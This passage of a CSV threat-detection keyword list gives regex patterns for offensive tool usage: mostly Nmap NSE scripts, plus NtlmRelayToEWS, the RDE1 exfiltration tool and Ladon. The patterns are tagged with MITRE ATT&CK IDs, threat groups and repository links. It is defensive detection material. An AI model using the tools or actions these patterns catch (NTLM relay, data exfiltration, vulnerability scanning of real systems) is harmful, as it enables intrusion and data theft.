Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1497" "* http-icloud-sendmsg.nse*",".{0,1000}\shttp\-icloud\-sendmsg\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1498" "* http-iis-short-name-brute.nse*",".{0,1000}\shttp\-iis\-short\-name\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1499" "* http-iis-webdav-vuln.nse*",".{0,1000}\shttp\-iis\-webdav\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1500" "* http-internal-ip-disclosure.nse*",".{0,1000}\shttp\-internal\-ip\-disclosure\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1501" "* http-joomla-brute.nse*",".{0,1000}\shttp\-joomla\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1502" "* http-jsonp-detection.nse*",".{0,1000}\shttp\-jsonp\-detection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1503" "* http-lexmark-version.nse*",".{0,1000}\shttp\-lexmark\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","N/A","7","627","59","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z","1504" "* http-lfi.nse*",".{0,1000}\shttp\-lfi\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","1505" "* http-litespeed-sourcecode-download.nse*",".{0,1000}\shttp\-litespeed\-sourcecode\-download\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1506" "* http-log4shell.nse*",".{0,1000}\shttp\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","1507" "* http-ls.nse*",".{0,1000}\shttp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1508" "* http-majordomo2-dir-traversal.nse*",".{0,1000}\shttp\-majordomo2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1509" "* http-malware-host.nse*",".{0,1000}\shttp\-malware\-host\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1510" "* http-mcmp.nse*",".{0,1000}\shttp\-mcmp\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1511" "* http-methods.nse*",".{0,1000}\shttp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1512" "* http-method-tamper.nse*",".{0,1000}\shttp\-method\-tamper\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1513" "* http-mobileversion-checker.nse*",".{0,1000}\shttp\-mobileversion\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1514" "* http-nikto-scan.nse*",".{0,1000}\shttp\-nikto\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","1515" "* http-ntlm-info.nse*",".{0,1000}\shttp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1516" "* http-open-proxy.nse*",".{0,1000}\shttp\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1517" "* http-open-redirect.nse*",".{0,1000}\shttp\-open\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1518" "* http-passwd.nse*",".{0,1000}\shttp\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1519" "* http-phpmyadmin-dir-traversal.nse*",".{0,1000}\shttp\-phpmyadmin\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1520" "* http-phpself-xss.nse*",".{0,1000}\shttp\-phpself\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1521" "* http-php-version.nse*",".{0,1000}\shttp\-php\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1522" "* http-proxy-brute.nse*",".{0,1000}\shttp\-proxy\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1523" "* http-put.nse*",".{0,1000}\shttp\-put\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1524" "* http-qnap-nas-info.nse*",".{0,1000}\shttp\-qnap\-nas\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1526" "* http-referer-checker.nse*",".{0,1000}\shttp\-referer\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1527" "* httprelayserver.py*",".{0,1000}\shttprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","1528" "* http-rfi-spider.nse*",".{0,1000}\shttp\-rfi\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1529" "* http-robots.txt.nse*",".{0,1000}\shttp\-robots\.txt\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1530" "* http-robtex-reverse-ip.nse*",".{0,1000}\shttp\-robtex\-reverse\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1531" "* http-robtex-shared-ns.nse*",".{0,1000}\shttp\-robtex\-shared\-ns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1532" "* https -i 0.0.0.0 -P * -k * --private-cert * --public-cert *",".{0,1000}\shttps\s\-i\s0\.0\.0\.0\s\-P\s.{0,1000}\s\-k\s.{0,1000}\s\-\-private\-cert\s.{0,1000}\s\-\-public\-cert\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","1533" "* http-sap-netweaver-leak.nse*",".{0,1000}\shttp\-sap\-netweaver\-leak\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1534" "* http-security-headers.nse*",".{0,1000}\shttp\-security\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1535" "* http-server-header.nse*",".{0,1000}\shttp\-server\-header\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1536" "* http-shellshock.nse*",".{0,1000}\shttp\-shellshock\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1537" "* http-sitemap-generator.nse*",".{0,1000}\shttp\-sitemap\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1538" "* http-slowloris.nse*",".{0,1000}\shttp\-slowloris\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1539" "* http-slowloris-check.nse*",".{0,1000}\shttp\-slowloris\-check\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1540" "* HTTPSniffer *",".{0,1000}\sHTTPSniffer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","1541" "* http-spider-log4shell.nse*",".{0,1000}\shttp\-spider\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","N/A","4","351","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z","1542" "* http-sql-injection.nse*",".{0,1000}\shttp\-sql\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability 